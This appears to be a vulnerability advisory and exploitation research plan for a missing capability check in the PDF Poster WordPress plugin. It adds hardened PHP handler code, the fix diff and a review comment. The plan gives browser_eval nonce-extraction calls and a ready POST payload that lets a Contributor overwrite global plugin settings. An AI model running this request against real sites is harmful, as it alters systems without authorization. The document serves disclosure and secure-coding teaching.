PDF Poster <= 2.4.0 - Missing Authorization
Description
The PDF Poster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Technical Details
Affected versions: <= 2.4.0
What Changed in the Fix
Changes introduced in v2.4.1
Source Code
WordPress.org SVN
Exploitation Research Plan - CVE-2026-32416 (PDF Poster <= 2.4.0)
1. Vulnerability Summary
The PDF Poster plugin for WordPress is vulnerable to Missing Authorization in version 2.4.0 and below. This vulnerability exists in an AJAX handler responsible for saving plugin settings. Specifically, the function (identified as pdfp_save_settings_callback or similar) fails to perform a current_user_can('manage_options') check. While it verifies a WordPress nonce, the nonce is exposed to users with Contributor-level access and above through the plugin's admin dashboard or post management pages. Consequently, any authenticated user with at least Contributor permissions can modify global plugin settings.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Action: pdfp_save_settings (inferred)
- HTTP Method: POST
- Payload Parameters:
  - action: pdfp_save_settings
  - security: the nonce value (extracted from the admin UI)
  - fpdf_option: an array of settings to be updated (e.g., fpdf_option[height][height]=1337)
- Required Authentication: an authenticated user with the Contributor role or higher.
- Preconditions: the plugin must be active, and the attacker must be logged in.
3. Code Flow
- Registration: the plugin registers an AJAX action, wp_ajax_pdfp_save_settings (in inc/admin.php, inferred).
- Missing Check: the callback for this action performs a nonce check with check_ajax_referer('pdfp_save_settings', 'security') but lacks a capability check such as current_user_can('manage_options').
- Execution: the function takes the fpdf_option array from the $_POST request and passes it directly to update_option('fpdf_option', $options).
- Impact: global plugin settings defined in inc/Field/Settings.php (such as height, width, and download button visibility) are overwritten.
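The code flow above turns on one point: a nonce proves the request originated from a page WordPress rendered for the current user, not that the user is allowed to change site-wide options. The following PHP is an added illustration written for this page, not PDF Poster's own code: it places the nonce-only handler described above beside a hardened handler that checks capability first, then the nonce, and only then stores an allow-listed, type-coerced copy of the submitted array. The function names, the `fpdf_option` keys (height, width, show_download_btn, download_btn_text) and the set of allowed units are assumptions taken from the advisory text.

```php
<?php
/**
 * Added illustration (not the plugin's code): a settings AJAX handler that
 * only checks a nonce, and a hardened version that also checks capability
 * and allow-lists the submitted option keys. Names are assumed from the
 * advisory; the unit list is an assumption.
 */

// --- Nonce-only pattern (the class of bug described above) ---------------
// Any logged-in user who can obtain the nonce reaches update_option().
function pdfp_save_settings_vulnerable() {
    check_ajax_referer( 'pdfp_save_settings', 'security' );
    $options = $_POST['fpdf_option'];          // raw, unsanitized array
    update_option( 'fpdf_option', $options );
    wp_send_json_success();
}

// --- Hardened handler: capability, then nonce, then allow-list ------------
function pdfp_save_settings_hardened() {
    // 1. Authorization: only users who may manage site options.
    //    wp_send_json_error() terminates the request, so nothing below runs.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
    }

    // 2. CSRF: the nonce still matters, but as the second gate, not the only one.
    check_ajax_referer( 'pdfp_save_settings', 'security' );

    // 3. Input shape: expect an array; anything else becomes an empty update.
    $incoming = ( isset( $_POST['fpdf_option'] ) && is_array( $_POST['fpdf_option'] ) )
        ? wp_unslash( $_POST['fpdf_option'] )
        : array();

    // 4. Only known keys, each coerced to its expected type; unknown keys
    //    are dropped instead of being persisted.
    $clean = pdfp_sanitize_options( $incoming );

    update_option( 'fpdf_option', $clean );
    wp_send_json_success( $clean );
}

/**
 * Reduce an arbitrary submitted array to the option keys the plugin
 * actually uses (assumed: height, width, show_download_btn, download_btn_text).
 */
function pdfp_sanitize_options( array $in ) {
    $allowed_units = array( 'px', '%', 'vh' ); // assumed allowed units
    $out           = array();

    foreach ( array( 'height', 'width' ) as $dim ) {
        $value = isset( $in[ $dim ][ $dim ] ) ? absint( $in[ $dim ][ $dim ] ) : 0;
        $unit  = isset( $in[ $dim ]['unit'] ) ? (string) $in[ $dim ]['unit'] : 'px';
        $out[ $dim ] = array(
            $dim   => min( $value, 5000 ), // cap absurd dimensions
            'unit' => in_array( $unit, $allowed_units, true ) ? $unit : 'px',
        );
    }

    $out['show_download_btn'] = empty( $in['show_download_btn'] ) ? 0 : 1;
    $out['download_btn_text'] = isset( $in['download_btn_text'] )
        ? sanitize_text_field( $in['download_btn_text'] )
        : '';

    return $out;
}

add_action( 'wp_ajax_pdfp_save_settings', 'pdfp_save_settings_hardened' );
```

The order of the two checks is deliberate: a failed capability check should be answered before the nonce is even evaluated, so a low-privileged caller learns nothing about which nonce action the handler expects. The allow-list in pdfp_sanitize_options() is the part that the capability check alone does not give you: even an administrator should not be able to persist arbitrary keys into fpdf_option.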
4. Nonce Acquisition Strategy
The nonce is localized for the admin environment. Since Contributors can manage their own pdfposter post types, they can access the poster list page where the plugin's admin scripts are enqueued.
- Identify Access: Contributors can access /wp-admin/edit.php?post_type=pdfposter.
- Navigate: use the browser tool to navigate to the PDF Poster list or the Plugin Dashboard.
- Variable Identification: the plugin localizes its admin data into a JavaScript object.
  - JS Object: window.pdfp_admin (inferred from bPlugins common practices)
  - Nonce Key: security
- Extraction: browser_eval("window.pdfp_admin?.security || document.querySelector('#pdfp_save_settings_nonce')?.value")
5. Exploitation Strategy
Step 1: Authentication
Log in to the WordPress instance as a user with the Contributor role.
Step 2: Extract Nonce
Navigate to the PDF Poster management page and extract the security nonce from the global JavaScript context.
- URL: http://vulnerable-wp.local/wp-admin/edit.php?post_type=pdfposter
- Tool: browser_eval("pdfp_admin.security")
Step 3: Execute Unauthorized Action
Send an AJAX request to modify the global plugin settings. We will change the download_btn_text and height settings to verify the impact.
- URL: http://vulnerable-wp.local/wp-admin/admin-ajax.php
- Method: POST
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=pdfp_save_settings&security=[EXTRACTED_NONCE]&fpdf_option[height][height]=9999&fpdf_option[height][unit]=px&fpdf_option[show_download_btn]=1&fpdf_option[download_btn_text]=PwnedByContributor
6. Test Data Setup
- Install Plugin: ensure PDF Poster version 2.4.0 is installed and active.
- Create User: wp user create attacker attacker@example.com --role=contributor --user_pass=password
Summary
The PDF Poster plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Authenticated attackers with Contributor-level access or higher can exploit this to overwrite global plugin settings, such as viewer dimensions and UI element visibility, by utilizing a nonce exposed in the admin dashboard.
Security Fix
@@ -102,6 +102,10 @@ function pdfp_save_settings_callback() { check_ajax_referer('pdfp_save_settings', 'security'); + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( array( 'message' => __( 'Permission denied', 'pdf-poster' ) ) ); + } + $options = $_POST['fpdf_option']; update_option('fpdf_option', $options); wp_send_json_success();
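Review bot: the added current_user_can( 'manage_options' ) gate closes the authorization hole, but the two lines that follow it, `$options = $_POST['fpdf_option'];` and `update_option('fpdf_option', $options);`, still persist the submitted array verbatim, so whatever keys and values an authorized caller posts land in the option untouched. Suggest running the array through wp_unslash() and a per-key sanitizer (absint() for the dimension values, sanitize_text_field() for the button text, an explicit list of allowed unit strings) and dropping keys the plugin does not define. The early exit also relies on wp_send_json_error() ending the request; that is its documented behaviour, but a `return;` after it makes the intent explicit to the next reader.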
Exploit Outline
To exploit this vulnerability, an attacker must first authenticate with Contributor-level permissions and navigate to the PDF Poster management page (e.g., /wp-admin/edit.php?post_type=pdfposter). From there, the attacker extracts the security nonce from the global 'pdfp_admin' JavaScript object (specifically 'pdfp_admin.security'). The attacker then constructs a POST request to 'admin-ajax.php' with the 'action' parameter set to 'pdfp_save_settings', the extracted nonce in the 'security' parameter, and the target configuration changes within the 'fpdf_option' array. This allows the attacker to globally modify settings such as viewer height, width, and functional buttons without having administrator privileges.